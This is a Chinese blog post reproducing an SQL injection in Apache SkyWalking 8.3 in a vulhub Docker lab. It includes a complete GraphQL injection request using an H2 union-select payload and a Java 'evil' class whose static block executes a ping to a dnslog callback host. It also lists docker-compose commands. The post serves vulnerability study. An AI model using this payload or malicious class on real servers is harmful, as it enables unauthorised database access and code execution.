Apache Skywalking =8.3 SQL注入分析复现

最新推荐文章于 2023-08-21 16:02:56 发布
最新推荐文章于 2023-08-21 16:02:56 发布
阅读量841 收藏 2
点赞数
分类专栏: 中间件漏洞复现 文章标签: vulhub web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/116453112
版权

声明

好好学习,天天向上

漏洞描述

Apache SkyWalking 是一款应用性能监控(APM)工具,对微服务、云原生和容器化应用提供自动化、高性能的监控方案。项目于 2015 年创建,并于 2017 年 12 月进入 Apache 孵化器。

Apache SkyWalking 提供了分布式追踪,服务网格(Service Mesh)遥感数据分析,指标聚合和可视化等多种能力。项目覆盖范围,从一个单纯的分布式追踪系统,扩展为一个可观测性分析平台(observability analysis platform)和应用性能监控管理系统。

基于CVE-2020-9483、CVE-2020-13921,由于修补并不完善,导致被发现还存在一处SQL注入漏洞。结合 h2 数据库(默认的数据库),可以导致 RCE 。

影响范围

Apache Skywalking <= 8.3

复现过程

这里使用8.3.0版本

使用vulhub

/app/vulhub/vulhub-master/skywalking/8.3.0-sqli

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.31.96:8080

在这里插入图片描述

BP抓包,利用报错注入获取版本


POST /graphql HTTP/1.1
Host: 192.168.31.96:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 554

{
    "query":"query queryLogs($condition: LogQueryCondition) {
  queryLogs(condition: $condition) {
    total
    logs {
      serviceId
      serviceName
      isError
      content
    }
  }
}
",
    "variables":{
        "condition":{
            "metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --",
                        "endpointId":"1",
                    "traceId":"1",
                    "state":"ALL",
                    "stateCode":"1",
            "paging":{
                "pageSize":10
            }
        }
    }
}

在这里插入图片描述

写一个恶意类,evil.java

import java.io.IOException;

public class evil {
    static {
        try {
            Runtime.getRuntime().exec("ping 7hmkm6.dnslog.cn");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {

    }
}

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID binbash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache-Skywalking-SQL注入复现+利用(CVE-2020-9483)
0xSec
03-12 1331
Apache SkyWalking使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。
Apache SkyWalking SQL注入(CVE-2020-9483)
jammny
02-01 881
漏洞详情 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。 影响版本 Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 漏洞分析 漏洞利用 访问/graphql进行抓包,POST提交如下poc:
Apache SkyWalkingSql注入(cve-2020-9483)
鸣蜩十四的博客
09-27 1447
简介 Apache SkyWalking 是一款应用性能监控(APM)工具,对微服务、云原生和容器化应用提供自动化、高性能的监控方案。项目于 2015 年创建,并于 2017 年 12 月进入 Apache 孵化器。 Apache SkyWalking 提供了分布式追踪,服务网格(Service Mesh)遥感数据分析,指标聚合和可视化等多种能力。项目覆盖范围,从一个单纯的分布式追踪系统,扩展为一个可观测性分析平台(observability analysis platform)和应用性能监控管理系统。 漏
[CVE-2020-9483/13921]Apache SkyWalking SQL注入
公众号shadow sock7
08-07 2814
参考: https://www.weibo.com/ttarticle/p/show?id=2309404520814409023617 编译好的6.5.0版本: wget https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gz cd apache-skywalking-apm-bin/bin vi oapService.sh 加上调试参数: DEBUG_OPTIONS="-agentlib
Apache Skywalking 8.3.0 SQL注入漏洞
EC_Carrot的博客
07-28 753
漏洞简介 在Apache Skywalking 8.3.0版本及以前的GraphQL接口中,存在一处H2 Database SQL注入漏洞。 漏洞复现 参考了这位大佬的文章:https://www.linuxlz.com/aqld/2028.html 发送如下数据包即可查看数据库版本: POST /graphql HTTP/1.1 Host: localhost:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mo
Apache SkyWalking 实战-预览1
08-03
Apache SkyWalking 是一个开源的应用性能监控(APM)和可观测性分析平台,专注于分布式系统的监控。它由中国开发者创立,并成为中国首个也是唯一的Apache顶级个人开源项目。SkyWalking 提供了多维度的性能分析工具,...
skywalking-python:Apache SkyWalking的Python代理
05-17
SkyWalking-Python :Apache SkyWalking的Python代理,它为Python项目提供了本机跟踪功能。 SkyWalking :一个APM(应用程序性能监视器)系统,专门为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的...
skywalking-kubernetes:Apache SkyWalking Kubernetes部署Helm Chart
02-03
Apache SkyWalking 是一款开源的应用性能监控(APM)系统,专为微服务、云原生架构设计,尤其在分布式追踪方面表现出色。它提供了一种高效的方式来监控和诊断分布式系统的性能问题,支持多种服务发现机制,包括 ...
skywalking建表SQL
11-12
skywalking启用mysql时的建表SQL,配置好mysql后,如果提示找不到表,可以使用此SQL来建表。
Apache Skywalking
11-24
Apache Skywalking 是一款开源的微服务监控和应用性能管理(APM)系统,尤其专注于分布式系统的 tracing、诊断和性能优化。这款工具在全球范围内被广泛应用于云原生环境,帮助开发者和运维人员理解复杂的分布式系统...
apache-skywalking-java-agent-8.9.0
05-21
Apache SkyWalking 是一个开源的应用性能监控(APM)系统,尤其专注于微服务、容器化和云原生环境。它的Java代理是其核心组件之一,用于收集应用运行时的数据。在这个"apache-skywalking-java-agent-8.9.0"版本中,...
Apollo&&Apache Skywalking原理图
05-02
Apache Skywalking则是一个可观测性分析平台,专注于微服务的性能监控,特别是分布式追踪。其主要特性包括: 1. **分布式追踪**:Skywalking可以自动收集服务间的调用链路数据,帮助开发者理解请求在微服务架构中的...
skywalking-nginx-lua:用于Apache SkyWalking的Nginx Lua代理
02-03
Apache SkyWalking Nginx代理 Nginx代理为由Nginx LUA模块提供支持的Nginx提供了本机跟踪功能。 该代理遵循SkyWalking跟踪和标头协议。 它通过HTTP协议向SkyWalking APM报告跟踪数据。 该代理可以收集所有通过...
apache-skywalking-java-agent-9.2.0
最新发布
05-18
Apache SkyWalking是一个强大的应用性能监控(APM)系统,尤其针对微服务、云原生和分布式系统的可观测性。这个“apache-skywalking-java-agent-9.2.0”压缩包包含了SkyWalking针对Java应用程序的代理,使得我们可以...
elasticsearch7 -skywalking8.3
ywtech的博客
04-08 223
```` [ucmed@localhost ~]$ cat /etc/hosts 127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6 192.168.3.148 elasticsearch skywal...
安全通告 | Apache SkyWalking SQL注入漏洞安全风险公告(CVE-2020-13921)
qcloud_security的博客
08-06 523
近日,腾讯蓝军(force.tencent.com)发现并向Apache SkyWalking官方团队提交SQL注入漏洞(漏洞编号:CVE-2020-13921),目前官方已发布新版本修复该漏洞。 为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏洞详情 Apache SkyWalking 是一款应用性能监控(APM)工具,对微服务、云原生和容器化应用提供自动化、高性能的监控方案。其官方网站显示,大量的国内互联网、银行、民航等领域的
Apache Skywalking <= 8.3 SQL注入(漏洞分析|snort规则编写)
weixin_68999845的博客
08-21 1125
Apache Skywalking
Apache-Skywalking-SQL注入(CVE-2020-9483)复现
weixin_42558965的博客
10-08 1212
漏洞描述 Apache SkyWalking 是一款应用性能监控(APM)工具,对微服务、云原生和容器化应用提供自动化、高性能的监控方案。当Apache SkyWalking使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。 影响版本 Apac
apache skywalking实战 pdf
08-07
1. Apache SkyWalking 的概述和特性:介绍了 SkyWalking 的基本原理和功能,包括请求追踪、性能指标监控、告警和日志分析等。 2. SkyWalking 的部署和配置:详细介绍了如何在各种环境下(包括单机和分布式环境)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值